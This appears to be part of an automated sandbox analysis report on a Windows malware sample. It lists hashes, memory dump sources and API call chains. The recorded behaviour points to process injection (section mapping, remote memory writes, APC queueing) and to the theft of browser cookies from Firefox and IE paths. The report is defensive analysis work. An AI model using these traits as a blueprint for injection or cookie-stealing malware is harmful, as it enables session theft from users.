  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
